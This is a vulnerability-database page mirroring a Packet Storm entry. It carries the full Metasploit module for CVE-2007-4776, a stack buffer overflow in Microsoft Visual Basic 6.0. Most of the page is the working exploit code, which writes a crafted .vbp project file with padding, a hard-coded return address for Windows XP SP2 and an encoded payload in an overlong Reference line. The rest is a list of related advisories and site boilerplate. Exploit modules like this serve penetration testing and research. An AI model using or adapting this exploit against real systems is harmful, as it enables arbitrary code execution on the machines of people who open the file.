Lucene search
K

Microsoft Visual Basic VBP Buffer Overflow

🗓️ 26 Nov 2009 00:00:00Reported by MCType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 48 Views

Microsoft Visual Basic VBP Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2007-4776
25 Sep 201000:00
circl
Check Point Advisories
Microsoft Visual Basic 6.0 VBP Project File Handling Buffer Overflow (CVE-2007-4776)
26 Nov 200900:00
checkpoint_advisories
CVE
CVE-2007-4776
10 Sep 200721:00
cve
Cvelist
CVE-2007-4776
10 Sep 200721:00
cvelist
Exploit DB
Microsoft Visual Basic - '.VBP' Local Buffer Overflow (Metasploit)
25 Sep 201000:00
exploitdb
Metasploit
Microsoft Visual Basic VBP Buffer Overflow
19 Oct 200912:58
metasploit
NVD
CVE-2007-4776
10 Sep 200721:17
nvd
Prion
Buffer overflow
10 Sep 200721:17
prion
Saint
Microsoft Visual Basic VBP file buffer overflow
5 Oct 200700:00
saint
Saint
Microsoft Visual Basic VBP file buffer overflow
5 Oct 200700:00
saint
Rows per page
`##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Visual Basic VBP Buffer Overflow',  
'Description' => %q{  
This module exploits a stack oveflow in Microsoft Visual  
Basic 6.0. When a specially crafted vbp file containing a long  
reference line, an attacker may be able to execute arbitrary  
code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'MC' ],  
'Version' => '$Revision: $',  
'References' =>  
[  
[ 'CVE', '2007-4776' ],  
[ 'BID', '25629' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},   
'Payload' =>  
{  
'Space' => 650,  
'BadChars' => "\x00\x0a\x0d\x20",  
'StackAdjustment' => -3500,  
'DisableNops' => 'True',  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ],   
],  
'Privileged' => false,  
'DisclosureDate' => 'Sep 4 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']),  
], self.class)  
  
end  
  
def exploit  
  
sploit = rand_text_alpha_upper(496) + [target.ret].pack('V')  
sploit << rand_text_alpha_upper(12) + [target['Scratch']].pack('V')  
sploit << make_nops(24) + payload.encoded  
  
vbp = "Type=Exe\r\n"  
vbp << "Form=Form2.frm\r\n"  
vbp << "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation"  
vbp << sploit + "\r\n"  
vbp << "Startup=\"Form2\"\r\n"  
vbp << "Command32=\"\"\r\n"  
vbp << "Name=\"Project2\"\r\n"  
vbp << "HelpContextID=\"0\"\r\n"  
vbp << "CompatibleMode=\"0\"\r\n"  
vbp << "MajorVer=1\r\n"  
vbp << "MinorVer=0\r\n"  
vbp << "RevisionVer=0\r\n"  
vbp << "AutoIncrementVer=0\r\n"  
vbp << "ServerSupportFiles=0\r\n"  
vbp << "VersionCompanyName=\"\"\r\n"  
vbp << "CompilationType=0\r\n"  
vbp << "OptimizationType=0\r\n"  
vbp << "FavorPentiumPro(tm)=0\r\n"  
vbp << "CodeViewDebugInfo=0\r\n"  
vbp << "NoAliasing=0\r\n"  
vbp << "BoundsCheck=0\r\n"  
vbp << "OverflowCheck=0\r\n"  
vbp << "FlPointCheck=0\r\n"  
vbp << "FDIVCheck=0\r\n"  
vbp << "UnroundedFP=0\r\n"  
vbp << "StartMode=0\r\n"  
vbp << "Unattended=0\r\n"  
vbp << "Retained=0\r\n"  
vbp << "ThreadPerObject=0\r\n"  
vbp << "MaxNumberOfThreads=1\r\n"  
vbp << "[MS Transaction Server]\r\n"  
vbp << "AutoRefresh=1\r\n"  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
file_create(vbp)  
  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation